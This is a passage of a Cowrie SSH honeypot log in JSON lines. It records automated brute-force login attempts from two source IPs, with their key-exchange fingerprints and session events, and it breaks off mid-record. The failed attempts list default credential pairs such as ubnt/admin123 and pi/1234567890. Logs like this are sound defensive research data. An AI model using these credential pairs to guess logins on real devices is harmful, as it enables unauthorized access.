{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.673606Z","src_ip":"212.227.125.160","session":"c4da138f8193"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin123","message":"login attempt [pi/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.825587Z","src_ip":"212.227.125.160","session":"73014698b974"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.347067Z","src_ip":"212.227.125.160","session":"f6e50205d428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60284,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f91b121a2c","protocol":"ssh","message":"New connection: 212.227.125.160:60284 (1.2.3.4:22) [session: 95f91b121a2c]","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.389834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.481215Z","src_ip":"212.227.125.160","session":"95f91b121a2c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.481797Z","src_ip":"212.227.125.160","session":"95f91b121a2c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.615234Z","src_ip":"212.227.125.160","session":"b0a1aa755b2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60288,"dst_ip":"1.2.3.4","dst_port":22,"session":"27bfa04914a4","protocol":"ssh","message":"New connection: 212.227.125.160:60288 (1.2.3.4:22) [session: 27bfa04914a4]","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.658061Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.763295Z","src_ip":"212.227.125.160","session":"c4da138f8193"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60292,"dst_ip":"1.2.3.4","dst_port":22,"session":"a380627078e5","protocol":"ssh","message":"New connection: 212.227.125.160:60292 (1.2.3.4:22) [session: a380627078e5]","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.810493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.811139Z","src_ip":"212.227.125.160","session":"a380627078e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.878918Z","src_ip":"212.227.125.160","session":"a380627078e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60302,"dst_ip":"1.2.3.4","dst_port":22,"session":"52b3ca11ef91","protocol":"ssh","message":"New connection: 212.227.125.160:60302 (1.2.3.4:22) [session: 52b3ca11ef91]","sensor":"my-vps","timestamp":"2025-08-26T11:33:41.986399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:42.171765Z","src_ip":"212.227.125.160","session":"52b3ca11ef91"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:42.172929Z","src_ip":"212.227.125.160","session":"52b3ca11ef91"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:42.174922Z","src_ip":"212.227.125.160","session":"73014698b974"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36028,"dst_ip":"1.2.3.4","dst_port":22,"session":"a33390763bcd","protocol":"ssh","message":"New connection: 196.251.86.249:36028 (1.2.3.4:22) [session: a33390763bcd]","sensor":"my-vps","timestamp":"2025-08-26T11:33:42.430715Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234567890","message":"login attempt [ubnt/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:42.988531Z","src_ip":"212.227.125.160","session":"a380627078e5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:43.263567Z","src_ip":"196.251.86.249","session":"a33390763bcd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:33:43.264280Z","src_ip":"196.251.86.249","session":"a33390763bcd"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567890","message":"login attempt [pi/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.041366Z","src_ip":"212.227.125.160","session":"52b3ca11ef91"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.154132Z","src_ip":"212.227.125.160","session":"a380627078e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34654,"dst_ip":"1.2.3.4","dst_port":22,"session":"76247cee9862","protocol":"ssh","message":"New connection: 212.227.125.160:34654 (1.2.3.4:22) [session: 76247cee9862]","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.199264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.317724Z","src_ip":"212.227.125.160","session":"76247cee9862"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.318361Z","src_ip":"212.227.125.160","session":"76247cee9862"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59114,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c2883a3f9c","protocol":"ssh","message":"New connection: 212.227.125.160:59114 (1.2.3.4:22) [session: f0c2883a3f9c]","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.712127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.713805Z","src_ip":"212.227.125.160","session":"f0c2883a3f9c"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"cancel","message":"login attempt [ubnt/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.731795Z","src_ip":"212.227.125.160","session":"76247cee9862"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.765614Z","src_ip":"212.227.125.160","session":"f0c2883a3f9c"}
{"eventid":"cowrie.login.failed","username":"peer","password":"peer","message":"login attempt [peer/peer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:44.954841Z","src_ip":"212.227.125.160","session":"f0c2883a3f9c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.084745Z","src_ip":"212.227.125.160","session":"52b3ca11ef91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34746,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71faf423ad5","protocol":"ssh","message":"New connection: 212.227.125.160:34746 (1.2.3.4:22) [session: d71faf423ad5]","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.126098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.126855Z","src_ip":"212.227.125.160","session":"d71faf423ad5"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1q2w3e","message":"login attempt [hadoop/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.169830Z","src_ip":"196.251.86.249","session":"a33390763bcd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.171682Z","src_ip":"212.227.125.160","session":"d71faf423ad5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"cancel","message":"login attempt [pi/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.550168Z","src_ip":"212.227.125.160","session":"d71faf423ad5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.777233Z","src_ip":"212.227.125.160","session":"76247cee9862"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34828,"dst_ip":"1.2.3.4","dst_port":22,"session":"01e969b1f0c9","protocol":"ssh","message":"New connection: 212.227.125.160:34828 (1.2.3.4:22) [session: 01e969b1f0c9]","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.820872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.821739Z","src_ip":"212.227.125.160","session":"01e969b1f0c9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.864929Z","src_ip":"212.227.125.160","session":"01e969b1f0c9"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"87654321","message":"login attempt [ubnt/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:45.996557Z","src_ip":"212.227.125.160","session":"01e969b1f0c9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.184645Z","src_ip":"212.227.125.160","session":"f0c2883a3f9c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.595379Z","src_ip":"212.227.125.160","session":"d71faf423ad5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34908,"dst_ip":"1.2.3.4","dst_port":22,"session":"d82ba0c1a2f6","protocol":"ssh","message":"New connection: 212.227.125.160:34908 (1.2.3.4:22) [session: d82ba0c1a2f6]","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.637422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.647976Z","src_ip":"212.227.125.160","session":"d82ba0c1a2f6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.680836Z","src_ip":"212.227.125.160","session":"d82ba0c1a2f6"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.710150Z","src_ip":"196.251.86.249","session":"a33390763bcd"}
{"eventid":"cowrie.login.failed","username":"pi","password":"87654321","message":"login attempt [pi/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:46.901686Z","src_ip":"212.227.125.160","session":"d82ba0c1a2f6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.083373Z","src_ip":"212.227.125.160","session":"01e969b1f0c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34968,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8f9ed02225","protocol":"ssh","message":"New connection: 212.227.125.160:34968 (1.2.3.4:22) [session: 5e8f9ed02225]","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.141275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.174919Z","src_ip":"212.227.125.160","session":"5e8f9ed02225"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 